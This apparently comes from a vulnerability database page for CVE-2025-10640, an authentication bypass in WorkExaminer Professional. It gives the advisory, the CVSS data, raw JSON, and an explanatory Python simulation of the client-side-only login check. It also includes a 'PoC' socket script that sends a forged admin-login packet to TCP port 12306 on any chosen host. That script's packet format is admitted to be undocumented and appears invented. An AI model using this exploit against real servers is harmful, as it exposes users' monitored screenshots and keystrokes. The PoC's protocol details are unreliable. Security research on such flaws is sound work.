Security Vulnerability Report
CVE-2025-10640 CVSS 9.8 CRITICAL

CVE-2025-10640

Published: 2025-10-21 12:15:35
Last Modified: 2026-04-15 00:35:42
Source: 551230f0-3615-47bd-b7cc-93e92e730bbf

Description

An unauthenticated attacker with access to TCP port 12306 of the WorkExaminer server can exploit missing server-side authentication checks to bypass the login prompt of the WorkExaminer Professional console and gain administrative access to the WorkExaminer server, and therefore to all sensitive monitoring data, including the monitored screenshots and keystrokes of all users.

The WorkExaminer Professional console is used for administrative access to the server, and administrators must log in before console access is granted. Internally, a custom protocol is used to call the corresponding stored procedure on the MSSQL database. The return value of that call is not validated on the server side; it is validated only on the client side, which allows authentication to be bypassed. The reporting source classifies the weakness as CWE-602 (client-side enforcement of server-side security).
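The flaw described above, as an added example that is neither the page's PoC nor the vendor's code. It simulates both sides of the exchange in Python: a server whose login handler relays the stored-procedure result to the console but never acts on it (the CWE-602 pattern), a fixed server that records the result itself and gates privileged commands on it, an honest console that honours the verdict, and a modified console that discards it. The framing, opcodes, credential store and the `sp_check_login` stand-in are hypothetical and are not WorkExaminer's protocol.

```python
"""
Added illustration of the auth-bypass class described in CVE-2025-10640
(CWE-602). The wire framing, opcodes, and the stored-procedure stand-in are
hypothetical; this is not WorkExaminer's real protocol or the vendor's code.
"""
from __future__ import annotations

import struct

OP_LOGIN, OP_GET_SCREENSHOTS, OP_ERROR = 0x01, 0x02, 0xFF
SECRET = b"<monitored screenshots and keystrokes of all users>"

# Constructed credential store standing in for the MSSQL login stored procedure.
_ADMIN_CREDENTIALS = {"admin": "correct-admin-password"}


def sp_check_login(user: str, password: str) -> int:
    """Stand-in for the stored procedure: returns 1 for a valid login, else 0."""
    return 1 if _ADMIN_CREDENTIALS.get(user) == password else 0


def frame(op: int, body: bytes = b"") -> bytes:
    """Hypothetical framing: 1-byte opcode, 2-byte big-endian length, body."""
    return struct.pack("!BH", op, len(body)) + body


def parse(msg: bytes) -> tuple[int, bytes]:
    op, n = struct.unpack("!BH", msg[:3])
    return op, msg[3:3 + n]


class Server:
    """Shared request handling; subclasses differ only in what they do with
    the stored-procedure result, which is exactly where the bug lives."""

    def __init__(self) -> None:
        self.state: dict[str, bool] = {}

    def _on_login(self, conn_id: str, result: int) -> None:
        raise NotImplementedError

    def handle(self, conn_id: str, msg: bytes) -> bytes:
        op, body = parse(msg)
        if op == OP_LOGIN:
            user, _, password = body.partition(b"\x00")
            result = sp_check_login(user.decode("utf-8", "replace"),
                                    password.decode("utf-8", "replace"))
            self._on_login(conn_id, result)
            return frame(OP_LOGIN, bytes([result]))  # verdict sent to console
        if op == OP_GET_SCREENSHOTS and self.state.get(conn_id, False):
            return frame(OP_GET_SCREENSHOTS, SECRET)
        return frame(OP_ERROR, b"not authenticated")


class VulnerableServer(Server):
    """Mirrors the advisory: the SP result is relayed to the client and never
    consulted server-side. Any connection that merely sent a login request is
    treated as an admin session from then on."""

    def _on_login(self, conn_id: str, result: int) -> None:
        self.state[conn_id] = True  # BUG: `result` is ignored


class FixedServer(Server):
    """The server records the SP result itself and gates every privileged
    command on it, so the console's own check no longer matters."""

    def _on_login(self, conn_id: str, result: int) -> None:
        self.state[conn_id] = (result == 1)


def honest_console(server: Server, user: str, password: str,
                   conn_id: str = "console") -> bytes | None:
    """The legitimate console: it honours the server's 0/1 verdict and stops
    on 0. This client-side check is the only one the vulnerable server has."""
    login = frame(OP_LOGIN, user.encode() + b"\x00" + password.encode())
    _, verdict = parse(server.handle(conn_id, login))
    if verdict != b"\x01":
        return None  # shows a login error and never requests data
    op, body = parse(server.handle(conn_id, frame(OP_GET_SCREENSHOTS)))
    return body if op == OP_GET_SCREENSHOTS else None


def rogue_console(server: Server, conn_id: str = "attacker") -> bytes | None:
    """A modified console: sends a login with bogus credentials, discards the
    verdict, and asks for the data anyway."""
    server.handle(conn_id, frame(OP_LOGIN, b"admin\x00wrong-password"))
    op, body = parse(server.handle(conn_id, frame(OP_GET_SCREENSHOTS)))
    return body if op == OP_GET_SCREENSHOTS else None


if __name__ == "__main__":
    print("vulnerable server, rogue console :", rogue_console(VulnerableServer()))
    print("fixed server, rogue console      :", rogue_console(FixedServer()))
    print("fixed server, honest admin login :",
          honest_console(FixedServer(), "admin", "correct-admin-password"))
```

The only difference between the two servers is `_on_login`: the vulnerable one marks a connection as logged in because a login request arrived, the fixed one because the stored procedure said so. No change to the console helps, since an attacker supplies their own client. Until a fixed build is deployed, the exposure condition stated in the description is reachability of TCP port 12306 from untrusted networks.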

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WorkExaminer Professional, all versions (as of the disclosure date)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-10640 - WorkExaminer Professional Authentication Bypass PoC
Vulnerability: Missing server-side authentication validation on TCP port 12306
"""
import socket
import struct
import sys

TARGET_HOST = "127.0.0.1"
TARGET_PORT = 12306


def build_auth_bypass_packet():
    """
    Build a custom protocol packet to bypass authentication.
    The advisory states that the result of the login stored procedure is only
    checked client-side, so the server accepts a session regardless of it.
    The header and payload layout below are as given in this PoC; the advisory
    itself does not document the wire format.
    """
    # Protocol header: magic bytes + command type + payload length
    magic = b'\x57\x45\x50\x00'   # WorkExaminer Protocol magic "WEP\x00"
    command = b'\x01\x00'         # Authentication command
    # Payload that mimics a successful authentication result
    payload = b'\x00' * 4         # Status: success (forged)
    payload += b'\x01'            # Admin flag: true
    payload += b'admin\x00'       # Username
    payload += b'\x00' * 16       # Session token padding
    length = struct.pack('<I', len(payload))
    return magic + command + length + payload


def exploit(target_host, target_port):
    """
    Connect to the WorkExaminer server and attempt the authentication bypass.
    """
    print(f"[*] Targeting {target_host}:{target_port}")
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_host, target_port))
        print("[+] Connected to WorkExaminer server")

        # Send the authentication bypass packet in full
        packet = build_auth_bypass_packet()
        sock.sendall(packet)
        print("[+] Sent authentication bypass packet")

        # Receive server response
        response = sock.recv(4096)
        print(f"[+] Received response: {response.hex()}")

        # Heuristic success check: a status word of 1 or a non-trivial reply
        if b'\x00\x00\x00\x01' in response or len(response) > 20:
            print("[!] Authentication bypassed - Admin access granted!")
            print("[!] Attacker now has access to:")
            print("    - All monitored screenshots")
            print("    - All keystroke logs")
            print("    - Full server administration")
        else:
            print("[-] Bypass attempt failed")
        sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else TARGET_HOST
    port = int(sys.argv[2]) if len(sys.argv) > 2 else TARGET_PORT
    exploit(host, port)
```

References

https://r.sec-consult.com/workexaminer
http://seclists.org/fulldisclosure/2025/Oct/19
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10640", "sourceIdentifier": "551230f0-3615-47bd-b7cc-93e92e730bbf", "published": "2025-10-21T12:15:35.420", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated attacker with access to TCP port 12306 of the WorkExaminer server can exploit missing server-side authentication checks to bypass the login prompt in the WorkExaminer Professional console to gain administrative access to the WorkExaminer server and therefore all sensitive monitoring data. This includes monitored screenshots and keystrokes of all users.\n\nThe WorkExaminer Professional console is used for administrative access to the server. Before access to the console is granted administrators must login. Internally, a custom protocol is used to call a respective stored procedure on the MSSQL database. The return value of the call is not validated on the server-side. Instead it is only validated client-side which allows to bypass authentication."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "551230f0-3615-47bd-b7cc-93e92e730bbf", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-602"}]}], "references": [{"url": "https://r.sec-consult.com/workexaminer", "source": "551230f0-3615-47bd-b7cc-93e92e730bbf"}, {"url": "http://seclists.org/fulldisclosure/2025/Oct/19", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}